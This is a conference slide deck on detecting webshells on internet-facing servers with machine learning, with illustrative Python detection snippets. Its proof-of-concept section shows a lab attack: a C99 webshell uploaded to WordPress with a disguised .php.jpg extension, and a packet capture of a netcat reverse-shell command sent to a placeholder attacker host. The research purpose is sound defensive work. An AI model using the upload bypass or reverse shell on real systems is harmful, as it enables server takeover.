Detection of webshells in compromised perimeter assets using ML algorithms

Detecting Webshells in Compromised
Perimeter Assets Using ML Algorithms
Rod Soto @rodsoto
Joseph Zadeh @josephzadeh

$Whoami
Rod Soto has over 15 years of experience in information technology and security. He is a security researcher and secretary
of the board of Hackmiami. He has spoken at ISSA, ISC2, OWASP, DEFCON, BlackHat, RSA, Hackmiami and Bsides,
and has been featured in Rolling Stone Magazine, Pentest Magazine, Univision and CNN. Rod Soto was the winner of the
2012 BlackHat Las Vegas CTF competition and is the founder and lead developer of the Kommand && KonTroll competitive
hacking tournament series.
Joseph Zadeh studied mathematics in college and received a BS from the University of California, Riverside and an MS and PhD
from Purdue University. While in college, he worked in a Network Operation Center focused on security and network
performance baselines, and during that time he spoke at DEFCON and Torcon security conferences. Most recently he joined
Caspida as a security data scientist. Previously, Joseph was part of the data science consulting team at Greenplum/Pivotal,
focused on cybersecurity analytics, and was also part of Kaiser Permanente's first cybersecurity R&D team.

The Perimeter
A network perimeter is the boundary between
the private and locally managed-and-owned side
of a network and the public and usually provider-
managed side of a network.*

What Are Perimeter Assets?
Perimeter assets are the infrastructure and application items that are exposed to
the internet or WAN. This may include:
- Routers
- IoTs (Cameras, RF,
- Firewalls/IDS/Load Balancers
- Servers (HTTP, DNS, IMAP, SMTP, SSH, VPN, etc)
- Yes… Cloud assets are also part of the perimeter as long as they have a link,
connection, shared credentials or access from within the organization.

Perimeter Assets: First Line Of Defense
Logically perimeter assets are the first line of defense.
- Constantly under attack
- Vulnerable to unknown/0-days (e.g., Heartbleed, Shellshock)
- Defenders must constantly monitor, update, patch
- Rely heavily on static signature technology, which is reactive and
passive
- 3rd party risks (Forgotten/Shared/Collocated, Unpatched, Unsecured APIs)

Perimeter Assets Can Become Unexpected Backdoors
Or more like a front door... Because they are exposed to the entire world, an attacker can
begin a campaign by attacking network perimeter assets and from there work
their way into the organization.
Consider this… Most organizations nowadays only expose ports 80 or 443, so it is
logical that web servers are prime targets, as are other internet-delivered
services such as mail, CMS, CRM, dev, storage, etc.

Do you think they might use the same credentials
internally? Maybe mail clients? Storage?

Why Use A Webshell
- Stealthy, compact, multifunctional tool
- Leverages the programming language used in
the web application (PHP, Java, ASP, etc)
- Obfuscates commands so they appear as normal “web traffic”
- Covert channel using SSL/TLS

What Is A Webshell
“A web shell is a script that can be uploaded to a
web server to enable remote administration of
the machine. Infected web servers can be either
Internet-facing or internal to the network, where
the web shell is used to pivot further to internal
hosts.” US CERT

Webshells Can Be Powerful Weapons

Some Examples Of Webshells
- C99, C100
- R57
- PhpJackal (evades AV)
- Soldier of Allah (Al-qaeda webshell)
- Weevely (Terminal like webshell,
very effective, small footprint)
- AspxSpy
- WSO (Web Shell by Orb)
- China Chopper (Has thick client)
- JspWebshell
- rootshell

Common Functions Of Webshells
- Authentication
- Remote administration / C2
- File management (View, Copy, Move, Upload, Download)
- Database management/connection
- Command Shell (ls, pwd, nc, cat, etc)
- Entrenchment (create persistence via new mechanisms like NC, Python, Perl)
- Encoding/Encryption

Webshells Can Provide Further Access
- Attackers often place a webshell and then use it to gain further access. Some
common next steps are:
- Stealing credentials
- Capturing traffic (Stats, behavior, protocols, etc)
- Footprinting internal network
- Local root/system exploits

How Are These Webshells Delivered?
Web shells can be delivered through a number of web application exploits or
configuration weaknesses including:
Cross-Site Scripting;
SQL Injection;
Vulnerabilities in applications/services (e.g., WordPress or other CMS
applications);
File processing vulnerabilities (e.g., upload filtering or assigned permissions);
Remote File Include (RFI) and Local File Include (LFI) vulnerabilities;
Exposed Admin Interfaces (possible areas to find vulnerabilities mentioned
above). *US Cert

Example Of An Exploit Campaign Using Webshell
Delivery of SamSam ransomware (2016)
- Exploit JBoss vulnerability (CVE-2010-0738/CVE-2013-4810) at exposed web server.
- Upload webshell (jbossinvoker, zecmd, cmd, etc)
- JBoss running with high privileges? No problem
- JBoss running with low privileges? Upload local root/system exploit
- Windows box? Upload PsExec (PowerShell now works on *nix as well)
- Distribute ransomware (SamSam), run Mimikatz? (PTH, PTT)

Layered ML
● Shades of Grey
– The layered security approach fuses multiple pieces of evidence together using a combination of models, rules and
statistics to move past the traditional detection solutions
● Sequencing Security Behaviors
– The next generation SIEM indexes all outputs and outcomes and uses rules, statistics, IOCs and intelligence along
with the fusion of ML models to build a central nervous system view of all possible risks in an environment
● Evidence Fusion: Overlay risk categories on top of each system in the
environment
– Defense Science Board, Resilient Military Systems and the Advanced Cyber Threat (Jan. 2013)

Use Case: Webshell on DMZ Asset, ML Evidence Fusion
Each attack step is paired with the ML security use case that covers it:
- Attack step: Exploit JBoss vulnerability (CVE-2010-0738/CVE-2013-4810) at exposed web server
  ML use case: Exploit chain model analyzes new traffic for 0-days and deliveries of malicious payload
  (https://github.com/jzadeh/Aktaion)
- Attack step: Attacker uploads lightweight webshell on compromised server (jbossinvoker, zecmd, cmd, etc)
  ML use case: Asset discovery model monitors for changes in the asset graph and dynamically detects assets
  acting out of band from their peer group
- Attack step: Beachhead established and trust relationship exploited from DMZ to LAN asset using in-memory malware
  ML use case: Beacon model analyzes communication for C2 patterns even when asynchronous or over small
  periods of activity
- Attack step: Domain Controller is attacked and LDAP directory and credential hashes exfiltrated
  ML use case: AD Tree model detects admin credentials performing out-of-band sequence of behavior
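
One simple way to picture what a beacon model looks for is timing regularity. The sketch below is only an illustration, not the model from the talk: the function name `beacon_score` and the scoring rule (one minus the coefficient of variation of the gaps between connections) are assumptions chosen for brevity.

```python
from statistics import mean, pstdev

def beacon_score(timestamps):
    """Return a 0..1 regularity score for connection times given in seconds.

    Hypothetical heuristic: 1 - coefficient of variation of the gaps between
    consecutive connections, clipped at 0. Values near 1 mean clock-like traffic.
    """
    if len(timestamps) < 3:
        return 0.0  # too few events to judge periodicity
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    avg = mean(gaps)
    if avg == 0:
        return 0.0
    cv = pstdev(gaps) / avg
    return max(0.0, 1.0 - cv)

regular = [0, 60, 120, 181, 240, 300]  # roughly one call-back per minute
bursty = [0, 2, 3, 50, 51, 300]        # irregular, human-like bursts

print(beacon_score(regular), beacon_score(bursty))
```

A production beacon model would also need to cope with jitter, sleep intervals and short observation windows, which this heuristic does not attempt.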

Adversarial Models
• Machine learning loses effectiveness the more complex the adversary

Adversarial Models
• Automatable actions: good for ML
• Non-automatable actions: hybrid human/computer analysis

Operator Time is Valuable!
● Google's Experience with ML in Cybersecurity:
https://web.stanford.edu/class/cs259d/lectures/Session11.pdf

Detecting Webshells With ML: References
• https://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/
• Going beyond the Indicator: https://vimeo.com/90687936
• Xin Sun, Xindai Lu, and Hua Dai. 2017. A Matrix Decomposition based Webshell Detection
Method. In Proceedings of the 2017 International Conference on Cryptography, Security and
Privacy (ICCSP '17). ACM, New York, NY, USA, 66-70. DOI:
https://doi.org/10.1145/3058060.3058083
• Ye Fei, Gong Jian, Yang Wang. Black Box Detection of Webshell Based on Support Vector
Machine. School of Computer Science and Technology, Southeast University; Key Laboratory
of Computer Network Technology of Jiangsu Province:
http://en.cnki.com.cn/Article_en/CJFDTotal-NJHK201506020.htm

Lambda Defense: Webshell Decomposition
= Global + Local Models

How do we Detect Webshells Using ML
• New approaches in machine learning and data science can help improve detection of compromised
perimeter assets.
• Two Models of Webserver Behavior: Global Asset Behavior and Local Webserver Content Behavior
(Dynamic + Static Content)
• Local Feature Vector Answers Questions Like: How many times do users take a similar path on
the webserver? How rare, statistically, is the path a user is browsing?
• Global Feature Vector Answers Questions Like: How often does this webserver communicate with
DMZ IPs? Is there a trust relationship that has changed?
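
The "how rare is this path" question can be made concrete with a frequency-based score. The sketch below is a minimal illustration, not the authors' feature vector: the function name `path_surprisal`, the add-one smoothing and the sample paths are all assumptions.

```python
import math
from collections import Counter

def path_surprisal(history, path):
    """Surprisal (-log2 probability) of `path` given past requests to one server.

    Add-one smoothing reserves some probability mass for paths never seen
    before, so an unseen path gets a finite but high score.
    """
    counts = Counter(history)
    total = len(history)
    vocab = len(counts) + 1  # +1 slot for "any unseen path"
    p = (counts[path] + 1) / (total + vocab)
    return -math.log2(p)

# Hypothetical request history for a single web server
history = ["/index.php"] * 90 + ["/wp-login.php"] * 10

for candidate in ("/index.php", "/wp-login.php", "/uploads/x.php.jpg"):
    print(candidate, round(path_surprisal(history, candidate), 2))
```

Common paths score low, occasional paths score higher, and a path that has never been requested scores highest, which is the ordering a local rarity feature needs.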

Webshell
DMZ to LAN Trust
Beyond the Indicator

How do we Detect Webshells Using ML: Global Stats
Anomalies on rare paths:
- U->S
- S->U !!
- U->U (LAN to LAN)
- S->S (DMZ to LAN) !!
(Diagram nodes: Desktop, Server, Desktop, Laptop; LAN Asset, DMZ Server)

Seeing the Analytic In Action
Once the identity resolution/learning process is complete, we
create new anomalies based on new paths/actions that are
rare for a particular population profile.
(Diagram label: Lightweight Webshell in the DMZ)
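
A toy version of "new paths that are rare for a population" is to compare observed connections against a learned baseline. The sketch below is an assumption-laden illustration: the host names, the `roles` mapping, and the reading of U as a user endpoint and S as a server are hypothetical, and a real system would use frequencies per peer group instead of a plain set.

```python
def new_edges(baseline, observed, roles):
    """Return (label, src, dst) for observed connections absent from the baseline.

    `roles` maps a host to "U" (user endpoint) or "S" (server); this reading of
    the U/S labels is an assumption made for the example.
    """
    seen = set(baseline)
    flagged = []
    for src, dst in observed:
        if (src, dst) not in seen:
            label = f"{roles.get(src, '?')}->{roles.get(dst, '?')}"
            flagged.append((label, src, dst))
    return flagged

# Hypothetical hosts and traffic
roles = {"dmz-web": "S", "lan-db": "S", "desk-1": "U"}
baseline = [("desk-1", "dmz-web"), ("desk-1", "lan-db")]
observed = [("desk-1", "dmz-web"), ("dmz-web", "lan-db")]

print(new_edges(baseline, observed, roles))
```

Here the DMZ web server talking to a LAN server for the first time is the only flagged edge, matching the S->S (DMZ to LAN) case that the slide marks as suspicious.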

How do we detect Webshells using ML...
Based on these indicators we look for sequential behaviors. For example, we can
look at the sequence of requests for a fixed (IP/User, Web server) pair. We can use Bro
logs, web server logs and perimeter traffic, as long as we have visibility into
the application layer.
By determining these sequences we can distinguish benign behavior from
sequences of behaviors that indicate webshell-like activity.
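
Building the sequence for a fixed (IP/User, Web server) pair is mostly a grouping step. The sketch below assumes log records have already been parsed into `(timestamp, client, server, path)` tuples; that record layout and the sample values are hypothetical.

```python
from collections import defaultdict

def request_sequences(records):
    """Group (timestamp, client, server, path) records into one time-ordered
    list of paths per (client, server) pair."""
    seqs = defaultdict(list)
    for ts, client, server, path in sorted(records):  # sort by timestamp first
        seqs[(client, server)].append(path)
    return dict(seqs)

# Hypothetical parsed log records, deliberately out of order
records = [
    (3, "10.0.0.5", "victimdomain", "/wordpress/wp-admin/"),
    (1, "10.0.0.5", "victimdomain", "/wordpress/?p=9"),
    (2, "10.0.0.5", "victimdomain", "/wordpress/wp-login.php"),
    (1, "10.0.0.7", "victimdomain", "/wordpress/?p=9"),
]

for pair, paths in request_sequences(records).items():
    print(pair, paths)
```

Each resulting list can then be fed to whatever sequence model is used to separate benign browsing from webshell-like activity.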

How do we Detect Webshells Using ML: Local Stats
Using machine learning techniques we can compute and build up statistics around some key data points.
In the context of this particular vector we can use rare means/low frequency counts for a fixed website:
- Rare time of site usage,
- Rare time stamping and creation of files,
- Rare connection patterns, large number of POST/GET requests to a specific file,
- Connection strings with command arguments (cmd.exe, /bin/bash, nc),
- Unusual direct connections to files exposed to the internet,
- Unusual UA in comparison to normal traffic patterns when users visit the website or search
engines index the site.
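
Two of the statistics listed above, POST concentration on a specific file and unusual user agents, reduce to low-frequency counts. The sketch below is illustrative only: the request schema (`method`, `path`, `ua` keys), the `rare_below` threshold and the sample traffic are assumptions.

```python
from collections import Counter

def local_stats(requests, rare_below=0.05):
    """Compute simple per-site statistics from parsed requests.

    `requests` is a list of dicts with 'method', 'path' and 'ua' keys
    (an assumed schema). `rare_below` is a hypothetical cut-off.
    """
    total = len(requests)
    posts = Counter(r["path"] for r in requests if r["method"] == "POST")
    uas = Counter(r["ua"] for r in requests)
    return {
        # share of all traffic that is a POST to each path
        "post_share_by_path": {p: n / total for p, n in posts.items()},
        # user agents responsible for less than `rare_below` of traffic
        "rare_user_agents": sorted(ua for ua, n in uas.items() if n / total < rare_below),
    }

# Hypothetical traffic: mostly normal browsing plus two POSTs from a rare client
requests = (
    [{"method": "GET", "path": "/index.php", "ua": "Mozilla/5.0"}] * 98
    + [{"method": "POST", "path": "/uploads/c9920161.php.jpg", "ua": "curl/7.0"}] * 2
)

stats = local_stats(requests)
print(stats)
```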

Webshell detection POC/Example
For the proof of concept we gathered data on benign, normal browsing behavior and
then replicated an RFI (Remote File Inclusion) attack, uploading a C99
webshell to the target host. In this particular sequence of referrer items it can be seen
how the attacker browses around the site, possibly footprinting and searching
for input fields.

The referrer sample sequence below shows browsing around the victim web site:
Referer: http://victimdomain/wordpress/?p=9
Referer: http://victimdomain/wordpress/wp-content/themes/default/style.css
Referer: http://victimdomain/wordpress/wp-content/plugins/category-grid-view-gallery/css/style.css?ver=2.8.5
Further review of referrers shows access to the WordPress login and admin pages:
Referer: http://victimdomain/wordpress/wp-login.php
Referer: http://victimdomain/wordpress/wp-admin/

Webshell POC/Example
The following sequence shows the attacker accessing the post feature and
uploading a C99 shell, bypassing sanitization controls by adding a .jpg extension to
the actual shell “c9920161.php”. This is done by abusing the new post feature, which
includes uploading media:
00:28:39.469021 IP attackerIP.51399 > victimdomain.80:
Flags [P.], seq 13419:14264, ack 145980, win 4096,
options [nop,nop,TS val 787343940 ecr 195280],
length 845: HTTP: GET /wordpress/wp-content/plugins
/a-gallery/timthumb.php?src=http://victimdomain/
wordpress/wp-content/uploads/2016/06/c992016.php.
jpg&w=125&h=125&zc=1 HTTP/1.1...D....GET /wordpress
/wp-content/plugins/a-gallery/timthumb.php?src=http
://victimdomain/wordpress/wp-content/uploads
/2016/06/c9920161.php.jpg&w=125&h=125&zc=1 HTTP/1.1

Referer: http://victimdomain/wordpress/wp-admin/post-new.php (Here is where
the web shell is uploaded)
Finally, the referrer sequence below shows the attacker browsing to the web shell.
The frequency of access is a signal for
operator behavior in the sequential component of the TTP:
Referer: http://victimdomain/wordpress/?p=13
Referer: http://victimdomain/wordpress/wp-content/uploads/
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
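
The ".php.jpg" trick in this sequence suggests one cheap feature to extract from referrer URLs: a script extension hidden before the final extension. The sketch below is a hedged illustration; the function name and the `SCRIPT_EXTS` list are assumptions, and a match is only a hint to investigate, not proof of a webshell.

```python
import posixpath
from urllib.parse import urlsplit

# Hypothetical list of server-side script extensions worth flagging
SCRIPT_EXTS = {".php", ".asp", ".aspx", ".jsp"}

def has_hidden_script_ext(url):
    """True if the file name carries a script extension before its final one,
    for example 'shell.php.jpg'."""
    name = posixpath.basename(urlsplit(url).path)
    parts = name.lower().split(".")
    # parts[1:-1] are the extensions that precede the final extension
    return any("." + ext in SCRIPT_EXTS for ext in parts[1:-1])

referers = [
    "http://victimdomain/wordpress/wp-login.php",
    "http://victimdomain/wordpress/wp-content/uploads/2016/06/",
    "http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg",
]

print([u for u in referers if has_hidden_script_ext(u)])
```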

In the following packet capture snippet it can be seen how the attacker uses netcat to send a reverse shell
utilizing the C99 command execution feature:
00:33:26.996555 IP attackerIP.51421 > victimdomain.80:
Flags [P.], seq 0:1014, ack 1, win 4117, options [nop,nop,TS val 787630908 ecr 267163], length 1014:
HTTP: POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg HTTP/1.1E..*..@.@......q.......P
.....U......%........K<....POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_c8c9d8ea3e0f27d770e745c21c00f45e
=test%7C1465100854%7Cd83074c4a4a1c097c4eb44b42165d190; wp-settings-time-2=1464928107; PHPSESSID=
cav3sgkd273gafknm9pb13m467act=cmd&cmd=nc+-e+%2Fbin%2Fbash+attackerIP+9999&d=%2Fvar%2Fwww%2
Fwordpress%2Fwp-content%2Fuploads%2F2016%2F06%2F&submit=Execute&cmd_txt=1
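
The command in the capture above is URL-encoded, so a detector has to decode the form body before matching command arguments. The sketch below uses the Python standard library to do that; the token pattern is taken from the command arguments named earlier in the deck (cmd.exe, /bin/bash, nc), while the function name and the choice of a regular expression are assumptions.

```python
import re
from urllib.parse import parse_qs

# Tokens from the deck's list of command arguments
SUSPICIOUS = re.compile(r"cmd\.exe|/bin/bash|\bnc\b")

def suspicious_params(body):
    """Decode a form-encoded request body and return {param: value} for values
    that contain shell-like tokens."""
    hits = {}
    for key, values in parse_qs(body).items():
        for value in values:
            if SUSPICIOUS.search(value):
                hits[key] = value
    return hits

# Form body as it appears in the packet capture
body = (
    "act=cmd&cmd=nc+-e+%2Fbin%2Fbash+attackerIP+9999"
    "&d=%2Fvar%2Fwww%2Fwordpress%2Fwp-content%2Fuploads%2F2016%2F06%2F"
    "&submit=Execute&cmd_txt=1"
)

print(suspicious_params(body))
```

Only the `cmd` parameter is returned, decoded to the netcat reverse shell command, while the directory and button parameters are ignored.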

Effective Webshell Detection via Machine Learning
• Webshell ML Detection Paradigm
• Two models of Behavior: Local behavior and Global Asset Behavior
• Local behavior is further broken down into individual history per path in a
Webserver. The webserver model is maintained as two separate individual
graphs one for dynamic content and one for static content
• Feature Vectors for the local content and path anomalies on a per webserver
basis are then correlated with global asset path behaviors.

Conclusion
- Machine learning and big data technologies enhance detection beyond
simple static signature-based defense technologies.
- It is possible to establish sequences of behaviors that indicate webshell
access and use.
- The data is already there. You can use your perimeter logs (Proxy, Firewalls,
Bro, Web Gateway, etc).
- Detection mechanisms can also be enhanced and extended by covering any
other measurable attack vector that delivers a web shell payload (SQLi, XSS,
other types of RFI, etc).

Appendix
Operational ML: How to Detect Attack
Patterns That Change Over Time

Step 1: Break the problem into use cases

Step 2: Find which use cases have the highest security impact

Step 3: Decompose the problem into two types of computation

Arbitrary User Behavior = Sequential Component + “Un-Ordered” Component

Examples
Sequential Behaviors
1. Exploit Chains
2. Timing Analysis (Periodicity)
3. Active Directory Sequence
4. Authentication Graph
Non Sequential Behaviors
1. Fingerprinting
2. Grouping Behaviors
3. Application Counts
4. Rare file extension counts for Webshell detection
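
The last non-sequential example, rare file extension counts, needs no ordering at all. The sketch below is one possible reading of it: the function name, the `max_share` threshold and the sample paths are assumptions.

```python
import posixpath
from collections import Counter

def rare_extensions(paths, max_share=0.01):
    """Return {extension: count} for extensions that make up at most
    `max_share` of all requested paths (threshold is hypothetical)."""
    exts = Counter(posixpath.splitext(p)[1].lower() or "(none)" for p in paths)
    total = sum(exts.values())
    return {e: n for e, n in exts.items() if n / total <= max_share}

# Hypothetical request paths for one web server
paths = ["/a.html"] * 150 + ["/b.css"] * 49 + ["/up/x.jsp"]

print(rare_extensions(paths))
```

Because the result depends only on counts, the order in which requests arrive does not matter, which is what makes this an un-ordered behavior.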

Mapping Behaviors to Computational Paths
Easy to Parallelize
1. Count()
2. Average()
3. Time series()
4. Local state computations
Per user/IP/account/…
Hard to Parallelize (NC Complete Complexity)
1. Rank()
2. Median()
3. Anything that keeps track of global state
4. Machine Learning Computations
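
The difference between the two lists shows up even on tiny data. In the sketch below (sample numbers are made up), per-worker counts merge by simple addition, while per-worker medians cannot be combined into the global median.

```python
from collections import Counter
from statistics import median

# The same event stream split across two hypothetical workers
partitions = [[1, 1, 2], [2, 9, 9, 9]]

# Count(): each worker counts locally, partial results merge by addition.
merged = sum((Counter(p) for p in partitions), Counter())

# Median: combining per-partition medians does not give the global median,
# because the answer depends on the global ordering of all values.
median_of_medians = median(median(p) for p in partitions)
true_median = median(x for p in partitions for x in p)

print(merged, median_of_medians, true_median)
```

The merged counter is exact, but the median of the partition medians differs from the true median, so the median computation needs global state.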

Step 4: Build an ML Model for each important sub-behavior
Each Model can be batch, real-time or hybrid mode

Step 5: Operationalize the Model Life Cycle

How do we programmatically learn new patterns over time?
When Is an ML Model Ready?
1. When should we re-train?
2. How should new data be weighted over old data?
3. How do we know when a model is ready?
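
One common answer to the weighting question is exponential decay, where older observations fade with a chosen half-life. This is offered only as an example of the idea, not as the approach used in the talk; the function name and parameters are assumptions.

```python
def decayed_update(old_count, new_count, half_life, elapsed):
    """Blend an old running count with new observations.

    The old value is halved every `half_life` time units, so recent data
    dominates without history being discarded outright.
    """
    decay = 0.5 ** (elapsed / half_life)
    return old_count * decay + new_count

# A running count of 100 from a week ago, 10 new events, 7-day half-life
print(decayed_update(100, 10, half_life=7, elapsed=7))
```

A short half-life makes the model adapt quickly but forget baselines sooner; a long one does the opposite, so the value is a tuning decision per use case.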

The Lambda Defense: A Complex Design Pattern

Data sources: DHCP, IMS/IPAM, FW, Proxy, VPN, AD
Real Time Identity Resolution (Distributed ETL):
Username = select coalesce(user_name, hostname, IP) from Active_ID_Table where IP = '10.10.100.23'
IP            DHCP.MAC           DHCP_Lasteventtime   AD_FQDN
10.100.1.23   58:5c:35:c3:6e:a4  2014-03-11T14:00:00  joe.eng.acme.com
10.13.11.221  12:3a:74:b2:6a:22  2014-03-12T14:30:00  ad.hr.acme.com
Diagram components: Data Ingest; Sequential Models and IOCs; Large Scale Models and Non-Sequential IOCs;
Real Time Layer; Batch Layer; Hybrid View (Batch + Real Time)
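
The identity resolution query amounts to "take the best available name for an IP". The sketch below mirrors that COALESCE logic in Python under stated assumptions: the table is modeled as an in-memory dict keyed by IP, and the AD_FQDN column from the sample rows is treated as the `hostname` field.

```python
def resolve_identity(active_ids, ip):
    """Return the first non-null of user_name, hostname, IP for `ip`,
    mirroring SQL COALESCE over an identity table keyed by IP."""
    row = active_ids.get(ip, {})
    for field in ("user_name", "hostname"):
        if row.get(field) is not None:
            return row[field]
    return ip  # fall back to the raw IP when nothing better is known

# Sample rows from the slide; mapping AD_FQDN to "hostname" is an assumption
active_ids = {
    "10.100.1.23": {"user_name": None, "hostname": "joe.eng.acme.com"},
    "10.13.11.221": {"user_name": None, "hostname": "ad.hr.acme.com"},
}

print(resolve_identity(active_ids, "10.100.1.23"))
print(resolve_identity(active_ids, "10.10.100.23"))
```

The second lookup falls back to the raw IP because no row exists for that address.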
